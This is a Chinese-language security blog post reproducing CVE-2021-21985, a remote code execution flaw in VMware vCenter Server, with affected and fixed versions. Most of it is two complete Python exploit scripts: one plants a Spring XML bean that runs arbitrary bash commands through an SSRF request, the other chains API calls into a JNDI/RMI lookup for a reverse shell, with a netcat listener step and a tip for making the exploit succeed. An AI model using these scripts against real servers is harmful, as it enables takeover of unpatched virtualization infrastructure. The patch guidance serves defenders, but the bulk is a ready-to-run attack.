CVE-2021-21985: VMware vCenter Server RCE复现

admin
admin
admin
102359
文章
87
评论
2021年7月6日01:00:50评论388 views字数 7048阅读23分29秒阅读模式


上方蓝色字体关注我们,一起学安全!
作者:daxi0ng@Timeline Sec
本文字数:3018
阅读时长:4~5min
声明:请勿用作违法用途,否则后果自负


0x01 简介

VMware vCenter Server服务器是一种高级服务器管理软件,它为控制vsphere环境提供了一个集中式平台,以便在混合云中实现可见性。


0x02 漏洞概述

编号:CVE-2021-21985

该漏洞存在于vSphere Client(HTML5)中,由于vCenter Server中默认启用的Virtual SAN Health Check插件缺乏输入验证,拥有443端口网络访问权限的攻击者可以利用此漏洞在承载vCenter Server的操作系统上远程执行任意命令。


0x03 影响版本

VMware vCenter Server:

非7.0 U2b版本的7.0版本

非6.7 U3n版本的6.7版本

非6.5 U3p版本的6.5版


VMware Cloud Foundation:

低于4.2.1版本的4.x版本

低于3.10.2.1版本的3.x版本


0x04 环境搭建

环境搭建可参考,此文不表

https://blog.csdn.net/z136370204/article/details/111719373


0x05 漏洞复现

1.首先使用POC执行whoami来测试是否存在该漏洞

#!/usr/bin/env python# -*- coding: utf-8 -*-"""@Author: r0cky@Time: 2021/6/3-16:57"""import base64import sysimport zipfilefrom urllib.parse import urlparse
import zlibimport jsonimport requestsimport urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)proxies={'https':'http://127.0.0.1:8080'}
def banner():    print("""==============================================================         _____           _              _____   _____ ______         / ____|         | |            |  __  / ____|  ____| __   _| |     ___ _ __ | |_ ___ _ __  | |__) | |    | |__      / / |    / _  '_ | __/ _  '__| |  _  /| |    |  __|     V /| |___|  __/ | | | ||  __/ |    | |  | |____| |____    _/  ________|_| |_|_____|_|    |_|  _\_____|______|
                              Powered by r0cky Team ZionLab==============================================================    """)


def create_xml():
    print("[*] Create Xml to offline_bundle.xml ...")    context = """<beans xmlns="http://www.springframework.org/schema/beans"       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"       xsi:schemaLocation="     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">    <bean id="pb" class="java.lang.ProcessBuilder">        <constructor-arg>          <list>            <value>/bin/bash</value>            <value>-c</value>            <value><![CDATA[ {cmd} 2>&1 ]]></value>          </list>        </constructor-arg>    </bean>    <bean id="is" class="java.io.InputStreamReader">        <constructor-arg>            <value>#{pb.start().getInputStream()}</value>        </constructor-arg>    </bean>    <bean id="br" class="java.io.BufferedReader">        <constructor-arg>            <value>#{is}</value>        </constructor-arg>    </bean>    <bean id="collectors" class="java.util.stream.Collectors"></bean>    <bean id="system" class="java.lang.System">        <property name="whatever" value="#{ system.setProperty(&quot;output&quot;, br.lines().collect(collectors.joining(&quot;n&quot;))) }"/>    </bean></beans>""".replace("{cmd}", cmd)    with open('offline_bundle.xml', 'w') as wf:        wf.write(context)        wf.flush()
def create_zip():    print("[*] Create Zip to offline_bundle.zip ...")    with zipfile.ZipFile('offline_bundle.zip', 'w', zipfile.ZIP_DEFLATED) as zp:        zp.write('offline_bundle.xml')
def toBase64():    with open('offline_bundle.zip', 'rb') as rf:        return base64.b64encode(rf.read())
def poc1(url):    ssrf_str = "https://localhost:443/vsanHealth/vum/driverOfflineBundle/data:text/html%3Bbase64,{}%23"    ssrf = ssrf_str.format(bytes.decode(toBase64()))
    print ("[*] Get XML to SystemProperties  ...")    target = url + "/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages"
    data = {"methodInput":[[ssrf]]}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)

def poc2(url):
    print("[*] getProperty   ...")    target = url + "/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty"
    data = {"methodInput": ["output", None]}
    r = requests.post(target, data=json.dumps(data), headers=headers,                      verify=False, proxies=proxies)    if "result" in r.json():        print("[+] Command:", cmd)        print(r.json()['result'])    else:        print ("[-] send payload failed.")
headers = {"Content-Type": "application/json"}
def main(url):    try:        create_xml()        create_zip()        poc1(url)        poc2(url)    except:        print("[-] send payload failed.")
if __name__ == '__main__':    banner()    try:        target = sys.argv[1]        cmd = sys.argv[2]        up = urlparse(target)        target = up.scheme + "://" + up.netloc        main(target)    except:        print("Example: ntpython3 " + sys.argv[0] + " <target> <cmd>n")


CVE-2021-21985: VMware vCenter Server RCE复现


CVE-2021-21985: VMware vCenter Server RCE复现


该POC创建了一个恶意xml文件,打包成zip,并base64后通过特定格式发送,返回包含result字段,及证明存在该漏洞


2、使用EXP反弹Shell

#!/usr/bin/env python# -*- coding: utf-8 -*-"""@Author: r0cky@Time: 2021/6/3-16:57"""
import sysfrom urllib.parse import urlparse
import jsonimport requestsimport urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)proxies={'https':'http://127.0.0.1:8080'}

def banner():    print("""==============================================================         _____           _              _____   _____ ______         / ____|         | |            |  __  / ____|  ____| __   _| |     ___ _ __ | |_ ___ _ __  | |__) | |    | |__      / / |    / _  '_ | __/ _  '__| |  _  /| |    |  __|     V /| |___|  __/ | | | ||  __/ |    | |  | |____| |____    _/  ________|_| |_|_____|_|    |_|  _\_____|______|
                              Powered by r0cky Team ZionLab==============================================================    """)

def payload1(url):    print ("[*] Step 1 setTargetObject to null ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetObject"
    data = {"methodInput":[None]}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)
    if "result" in r.json():        payload2(url)    else:        print ("[-] send payload failed1.")

def payload2(url):    print("[*] Step 2 setStaticMethod to payload ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setStaticMethod"
    data = {"methodInput": ["javax.naming.InitialContext.doLookup"]}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)
    if "result" in r.json():        payload3(url)    else:        print ("[-] send payload failed2.")
def payload3(url):    print("[*] Step 3 setTargetMethod to doLookup ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetMethod"
    data = {"methodInput": ["doLookup"]}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)
    if "result" in r.json():        payload4(url)    else:        print ("[-] send payload failed3.")
def payload4(url):    print("[*] Step 4 setArguments with payload args ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setArguments"
    data = {"methodInput": [[rmi_class]]}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)
    if "result" in r.json():        payload5(url)    else:        print ("[-] send payload failed4.")
def payload5(url):    print("[*] Step 5 initial payload class and methods ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/prepare"
    data = {"methodInput": []}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)
    if "result" in r.json():        payload6(url)    else:        print ("[-] send payload failed5.")
def payload6(url):    print("[*] Step 6 trigger method invoke ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/invoke"
    data = {"methodInput": []}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)
    print("[+] send payload success.")    print()    print("[END] VMWare vCenter RCE Done.")
headers = {"Content-Type": "application/json"}
if __name__ == '__main__':    banner()    try:        target = sys.argv[1]        rmi_class = sys.argv[2]        up = urlparse(target)        target = up.scheme + "://" + up.netloc        payload1(target)    except:        print("Example: ntpython3 " + sys.argv[            0] + " <target> <rmi://ip/class>n")


首先需要启动RMI


CVE-2021-21985: VMware vCenter Server RCE复现


然后开启reverse shell监听

nc -lvnp 5555

最后执行EXP


CVE-2021-21985: VMware vCenter Server RCE复现


CVE-2021-21985: VMware vCenter Server RCE复现


注意:复现中发现该EXP的payload5和payload6函数中的None要删掉,不然会失败


CVE-2021-21985: VMware vCenter Server RCE复现


CVE-2021-21985: VMware vCenter Server RCE复现


CVE-2021-21985: VMware vCenter Server RCE复现


0x06 修复方式


VMware vCenter Server:

7.0版本升级到7.0 U2b

6.7版本升级到6.7 U3n

6.5版本升级到6.5 U3p

VMware Cloud Foundation:

4.x版本升级到4.2.1

3.x版本升级到3.10.2.1


参考链接:
https://github.com/r0ckysec/CVE-2021-21985
https://github.com/xnianq/cve-2021-21985_exp
https://www.vmware.com/security/advisories/VMSA-2021-0010.html


CVE-2021-21985: VMware vCenter Server RCE复现

CVE-2021-21985: VMware vCenter Server RCE复现
阅读原文看更多复现文章
Timeline Sec 团队
安全路上,与你并肩前行





本文始发于微信公众号(Timeline Sec):CVE-2021-21985: VMware vCenter Server RCE复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月6日01:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2021-21985: VMware vCenter Server RCE复现http://cn-sec.com/archives/413816.html

发表评论

匿名网友 填写信息